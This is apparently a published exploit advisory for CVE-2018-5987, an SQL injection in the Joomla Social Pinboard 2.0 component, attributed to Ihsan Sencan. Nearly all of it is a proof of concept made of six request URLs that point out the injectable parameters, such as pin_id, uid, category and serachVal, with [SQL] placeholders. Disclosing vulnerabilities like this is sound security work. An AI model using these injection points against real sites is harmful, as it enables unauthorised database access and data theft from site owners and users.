# # # # # Exploit Title: Joomla! Pinterest Clone Social Pinboard 2.0 - SQL Injection # Dork: N/A # Date: 16.02.2018 # Vendor Homepage: https://www.apptha.com/ # Software Link: https://www.apptha.com/joomla/social-pinboard-script # Version: 2.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: CVE-2018-5987 # # # # # Exploit Author: Ihsan Sencan # # # # # # POC: # # 1) # http://localhost/[PATH]/index.php?option=com_socialpinboard&view=ajaxcontrol&tmpl=component&task=getlikeinfo&pin_id=[SQL]&user_id=[SQL] # # 2) # http://localhost/[PATH]/index.php?option=com_socialpinboard&view=gift&starts=100&ends=[SQL] # # 3) # http://localhost/[PATH]/index.php?option=com_socialpinboard&view=home&category=[SQL] # # 4) # http://localhost/[PATH]/index.php?option=com_socialpinboard&view=pindisplay&uid=[SQL] # # 5) # http://localhost/[PATH]/index.php?option=com_socialpinboard&view=search&serachVal=[SQL] # # 6) # http://localhost/[PATH]/index.php?option=com_socialpinboard&view=likes&uid=[SQL] # # # # #